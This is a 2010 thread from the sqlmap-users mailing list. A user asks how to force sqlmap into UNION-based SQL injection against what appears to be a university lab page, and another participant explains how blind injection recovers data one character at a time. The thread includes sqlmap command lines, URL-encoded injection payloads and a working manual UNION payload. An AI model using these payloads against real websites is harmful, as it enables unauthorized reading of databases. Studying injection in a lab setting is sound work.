Re: [sqlmap-users] Fw: Which get was the right
Brought to you by:
inquisb
From: Beatriz D. <bea...@ya...> - 2010-01-22 08:34:38
|
Ok, got it; now that takes me to another issue; sqlmap says that the target doesn't work with UNION: [02:24:17] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability [02:24:17] [INFO] confirming partial (single entry) inband sql injection on parameter 'departamento' by appending a false condition after the parameter value [02:24:18] [TRAFFIC OUT] HTTP request: GET /uoc/alumnos/sqlinjection/?departamento=0%20AND%203320=3321%20UNION%20ALL%20SELECT%20NULL%23%20AND%203353=3353 HTTP/1.1 But if I apply directly: http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27 It works, the number 1234 is shown as part of a list; is there a way to force sqlmap to work with UNION and avoid the testing that --use-union does? I Have Learned So much from God That I can no longer Call Myself A Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much of Itself With me That I can no longer call myself A man, a woman, and angel Or even pure Soul. Love has Befriended Hafiz so completely It has turned to ash And freed Me Of every concept and image My mind has ever known. –Hafiz, Persian poet (1315 – 1390) ________________________________ From: Ignacio Hernández <nac...@gm...> To: Beatriz Duran <bea...@ya...> Sent: Thu, January 21, 2010 8:41:14 AM Subject: Re: [sqlmap-users] Fw: Which get was the right ok, that's because is a blind sql injection. you can google it to find more info about it but the bassic is tha in blind sqli you try to figure out the result of vthe query char by char. for example if the user is root, you have to first find r, then o... This is like this because in blind sql injections the database only answers "True" or "False". so you ask the database: is the first char bigger than "a"? Then it answers yea... and so on. Thats why there are so many querys, all of them needed to guess the content of the query. El 21/01/2010 7:37, "Beatriz Duran" <bea...@ya...> escribió: > > >>For example, you run: > >sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()" > >After the execution you find the current user: > >[00:11:15] [INFO] retrieved: usqli@localhost >[00:11:15] [DEBUG] performed 112 queries in 87 seconds >SELECT CURRENT_USER(): 'usqli@localhost' > >>But the results say that 112 queries were tried, like: > >something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1 > >How can I know which one of the 112 got the result? > > > > > > >> > > >> >> ________________________________ > >From:Ignacio >Hernández [mailto:nac...@gm...] >Sent: Miércoles, 20 de Enero de >2010 06:10 p.m. >To: Duran, Beatriz >Subject: Re: [sqlmap-users] Which >get was the right >> > > >HI Beatriz > >When you run sqlmap against a target and one of the tests succeeds, sqlmap tells yo... >2010/1/20 Duran, Beatriz > >>Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but... > > >------------------------------------------------------------------------------ >Throughout its 18-yea... > > >> > > > > > > > > > > > > KPMG esta comprometido con la responsabilidad ambiental. > > > > Por ... > >------------------------------------------------------------------------------ >>Throughout its 18-year history, RSA Conference consistently attracts the >>world's best and brightest in the field, creating opportunities for Conference >>attendees to learn about information security's most important issues through >>interactions with peers, luminaries and emerging and established companies. >http://p.sf.net/sfu/rsaconf-dev2dev >_______________________________________________ >>sqlmap-users mailing list >sql...@li... >https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |